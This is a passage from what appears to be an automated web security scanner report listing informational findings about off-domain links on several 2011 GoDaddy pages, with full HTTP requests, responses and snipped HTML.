The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?isc=GPASH002 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageTwo; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:21 GMT
Content-Length: 250092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/fos/css/1/sales_https_20110128ak.css" /><title>
...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" /><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/pc_css/1/gd_20110321_https.min.css" />
<link rel="canonical" href="https://www.godaddy.com/Default.aspx"/>
...[SNIP]...
</style>

<link rel="shortcut icon" href="https://img1.wsimg.com/assets/godaddy.ico" /><meta name="description" content="Register &amp; transfer domains for less. Reliable hosting. Easy-to-use site builders. Affordable SSL certificates. eCommerce solutions. ICANN-accredited." />
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
<input type="text" id="promoCode" maxlength="20" style="width:350px;" /><img src="https://img1.wsimg.com/fos/btn/1/51538_btn_submit.png" alt="Submit" title="Submit" style="position:relative;top:4px;left:12px;cursor:pointer;" onclick="onSubmitClick();RecordClick(event, '22514', this);" />
</div>
...[SNIP]...
</span> Check out our latest sales and special offers.<img src="https://img1.wsimg.com/fos/btn/1/51538_btn_go.png" style="position:relative;top:4px;left:7px;cursor:pointer;" alt="Go" title="Go" onclick="location.href='offers/hot-deals.aspx?ci=22509&isc=GPASH002'" /></div>
...[SNIP]...
</span> View our HOT Internet-only commercials.
<img src="https://img1.wsimg.com/fos/btn/1/51538_btn_go.png" style="position:relative;top:4px;left:16px;cursor:pointer" alt="Go" title="Go" onclick="location.href='https://videos.godaddy.com/godaddy_media.aspx?ci=43710&isc=GPASH002'" />
</div>
...[SNIP]...
</span><img src="https://img1.wsimg.com/fos/btn/1/51538_btn_go.png" style="position:relative;top:4px;left:5px;cursor:pointer;" onclick="location.href='https://community.godaddy.com/quiz?ci=39356&isc=GPASH002'" /></div>
...[SNIP]...
</style>

<script src="https://img3.wsimg.com/fos/script/QuickBuyInsert8.min.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"></script>
...[SNIP]...
<div id="bottomPod02" style="width:1000px;height:192px;padding: 5px 0px 4px 0px;">

<script src="https://img3.wsimg.com/fos/script/ProductAdvisor5.min.js" type="text/javascript"></script>
...[SNIP]...
<div class="PodContainer">


<script src="https://img3.wsimg.com/fos/script/ViewExtensionsInsert7.min.js" type="text/javascript"></script>

<script src="https://img3.wsimg.com/fos/script/jquery.tablesorter.min.js" type="text/javascript"></script>
...[SNIP]...
in:10px 0px 0px 0px;" title=".CO domains $11.99 first year" class="tldLinkTwo" onclick="location.href='https://www.godaddy.com/tlds/co-domain.aspx?tld=co&ci=42595&isc=GPASH002'">
<img style="float: left;" alt=".us" title=".CO domains $11.99 first year" src="https://img1.wsimg.com/fos/hp/1/ProductDeals/55253_img_co.png" />
<p id="ctl00_MainContent_ctl00_ctl00_SpotlightControl_SpotlightTwo_DomainDealsText" style="float:left;margin:0px 0px 0px 6px;padding:0px;color:#333;font-size:11px;line-height:15px
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
...[SNIP]...
20.102. https://www.godaddy.com/Hosting/web-hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /Hosting/web-hosting.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Hosting/web-hosting.aspx?ci=13891&isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Hosting/web-hosting.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=ci=13891&isc=gpash016%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash016&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:30 GMT
Content-Length: 161114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/fos/css/1/sales_https_20110128ak.css" /><title>

</title><meta http-equiv="Pragma" content="no-cache" /><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/pc_css/1/gd_20110321_https.min.css" />


<link rel="canonical" href="https://www.godaddy.com/Hosting/web-hosting.aspx"/>
...[SNIP]...
e, transfer, register, domain, URL, web address, internet address, web site name, bulk domain registration, buy domain, email, e-mail, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy" /><link rel="shortcut icon" href="https://img1.wsimg.com/assets/godaddy.ico" /><meta property="og:title" content="4th GenerationWeb Hosting from GoDaddy.com">
...[SNIP]...
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
<td><img src="https://img1.wsimg.com/fos/icn/img_4gh_small.png" class="img4ghLogo pointer" alt="4th Generation Hosting" /></td>
...[SNIP]...
<td style="padding-right:32px;"><img src="https://img1.wsimg.com/fos/icn/img_4gh_small.png" class="img4ghLogo pointer" alt="4th Generation Hosting" /></td>
...[SNIP]...
<td><img src="https://img1.wsimg.com/fos/icn/img_4gh_small.png" class="img4ghLogo pointer" alt="4th Generation Hosting" /></td>
...[SNIP]...
<div class="floatleft" style="padding: 3px 0 0 0;" onmouseover="atl_ShowQuickHelp(event,'scawards2011', true);" onmouseout="atl_HideQuickHelp();"><img alt="" src="https://img1.wsimg.com/fos/img/img_scaward.png" /></div>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
   

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.min.js" type="text/javascript"></script>
...[SNIP]...
20.103. https://www.godaddy.com/catalog.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /catalog.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /catalog.aspx?isc=GPASH009&se=%2B&ci=287 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/catalog.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH009&se=%2b&ci=287%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH009&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:35 GMT
Content-Length: 108151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/fos/css/1/sales_https_20110128ak.css" /><title>
...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" /><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/pc_css/1/gd_20110321_https.min.css" />

<link rel="canonical" href="https://www.godaddy.com/catalog.aspx"/>
...[SNIP]...
NS, URL, web address, internet address, web site name, bulk domain registration, buy domain, private domain registrations, bulk price, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy" /><link rel="shortcut icon" href="https://img1.wsimg.com/assets/godaddy.ico" /></head>
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
</div>
<img src="https://img1.wsimg.com/fos/hdr/1/hdr_catalog.png" border="0" width="1000" height="100" alt="Quick Shop Catalog - Know what you want? Get it here and you're on your way!" title="Quick Shop Catalog - Know what you want? Get it here and you're on your way!" /><br />
...[SNIP]...
<li><a href="https://www.bobparsons.me/bp_16_rules.php?ci=20844&isc=GPASH009">Bob Parsons&#174; 16 Rules Poster</a>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
...[SNIP]...
20.104. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /domains/search.aspx?isc=gpash003 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=gpash003%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash003&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=dbegbbdjagnaejceielbzacgmhtcefba; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:34 GMT
Content-Length: 210017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/fos/css/1/sales_https_20110128ak.css" /><title>
...[SNIP]...
<meta http-equiv="Pragma" content="no-cache" /><link rel="Stylesheet" type="text/css" href="https://img2.wsimg.com/pc_css/1/gd_20110321_https.min.css" />


<meta name="description" content="Pay less for domain names. Register your .com, .net and .org domains from $9.99/yr. Bulk pricing and private domain name registration options." />
...[SNIP]...
</style>
<link rel="shortcut icon" href="https://img1.wsimg.com/assets/godaddy.ico" /></head>
<body id="ctl00_PageBody" style="width:100%;margin:0;">
   
<script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!--HEADERBEGIN-->

<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
<td style="text-align: right; background-color: #E4EFC7;">
<img name="btnProceedToCheckout" id="btnProceedToCheckout" src="https://img1.wsimg.com//fos/btn/1/49314_addandproceedtocheckout.gif"
alt="Add and Proceed to Checkout" style="cursor:pointer; border-width: 0px; margin-right:20px;" onclick="AddAndCheckout();" />
</td>
...[SNIP]...
<div style="float:left;">
&nbsp; | <img src="https://img1.wsimg.com/fos/icn/53640_icn_usflag.png" alt=".US Sale" />&nbsp;<a href="/tlds/us.aspx?ci=43538&isc=gpash003" style='color: #729620;'>
...[SNIP]...
<div class="spinner_div_container" id="spinner_div_container" style="display: none;"><img alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif" /></div>
...[SNIP]...
<td style="padding: 0 10px 0 15px; text-align: center; height: 200px;">
<img alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif" />
</td>
...[SNIP]...
<td style="padding: 0 10px 0 15px; text-align: center; height: 200px;">
<img alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif" />
</td>
...[SNIP]...
<td style="padding: 0 10px 0 15px; text-align: center; height: 200px;">
<img alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif" />
</td>
...[SNIP]...
</div>
       

<script src="https://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js?version=1" type="text/javascript"></script>


<script src="https://img3.wsimg.com/fos/script/sales14.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://img3.wsimg.com/fos/script/atlantis_jquery8.js" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center; margin:30px auto auto auto;" id="popInSmallSpinnerImageContainer">

<img alt="" src="https://img1.wsimg.com/fos/icn/ajax-spinner-med.gif" />
</div>
...[SNIP]...
<!-- Advertiser 'Go Daddy Software', Include user in segment 'Site Retargeting Pixel (WH)' - DO NOT MODIFY THIS PIXEL IN ANY WAY --><img src="https://ad.yieldmanager.com/pixel?id=427800&t=2" width="1" height="1" /><!-- End of segment tag -->
...[SNIP]...
20.105. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /gdshop/hosting/landing.asp?isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3Dgpash016&isc=gpash016&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:26 GMT
Content-Length: 246275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
e, transfer, register, domain, URL, web address, internet address, web site name, bulk domain registration, buy domain, email, e-mail, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy">
<link rel="shortcut icon" href="https://imagesak.securepaynet.net/assets/godaddy.ico">
<link rel="stylesheet" type="text/css" href="https://img2.wsimg.com/pc_css/1/gd_20110321_https.min.css" /><link rel="stylesheet" type="text/css" href="https://imagesak.securepaynet.net/css/20090113_1.css">

<style type="text/css">
...[SNIP]...
<body bgcolor="#FFFFFF" topmargin="0" leftmargin="0" marginheight="0" marginwidth="0" style="text-align:left; margin:0;">
<script src="https://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"></script><div style="position:absolute;top:0;left:0;width:1px;height:1px;"><img src="https://imagesak.securepaynet.net/assets/spc_trans.gif" border="0" width="1" height="1" alt="Welcome to Go Daddy Software. If you are visually impaired and would like to check the availability of a domain, make a purchase, or just have questions please call us at (480) 505-8877. You may also email us at support@godaddy.com to request a website service callback.. We are currently in the process of implementing more accessibility for our visitors so feel free to check back in the near future..Thank you for your interest in our company."></div>
...[SNIP]...
<!-- BEGIN HEADER -->
<script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110203.min.js"></script>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/login.php">
My Webmail</a>
...[SNIP]...
<strong><a href="https://email.secureserver.net/">
Check My Webmail</a>
...[SNIP]...
<td><img src="https://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('https://imagesak.securepaynet.net/aaa/help/hlp_top.gif');background-repeat:repeat-x;"><img src="https://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="https://imagesak.securepaynet.net/aaa/help/hlp_toprt.gif" width="5" height="5"></td>
...[SNIP]...
<td style="background-image:url('https://imagesak.securepaynet.net/aaa/help/hlp_sidelft.gif');background-repeat:repeat-y;"><img src="https://imagesak.securepaynet.net/assets/spc_trans.gif" width="4" height="1"></td>
...[SNIP]...
<td style="background-image:url('https://imagesak.securepaynet.net/aaa/help/hlp_sidert.gif');background-repeat:repeat-y;"><img src="https://imagesak.securepaynet.net/assets/spc_trans.gif" width="5" height="1"></td>
...[SNIP]...
<td><img src="https://imagesak.securepaynet.net/aaa/help/hlp_botlft.gif" width="4" height="5"></td>
               <td style="width:331px;background-image:url('https://imagesak.securepaynet.net/aaa/help/hlp_bot.gif');background-repeat:repeat-x;"><img src="https://imagesak.securepaynet.net/assets/spc_trans.gif" width="1" height="5"></td>
               <td><img src="https://imagesak.securepaynet.net/aaa/help/hlp_botrt.gif" width="5" height="5"></td>
...[SNIP]...
<td><img src="https://imagesak.securepaynet.net/aaa/help/hlp_toplft.gif" width="4" height="5"></td>
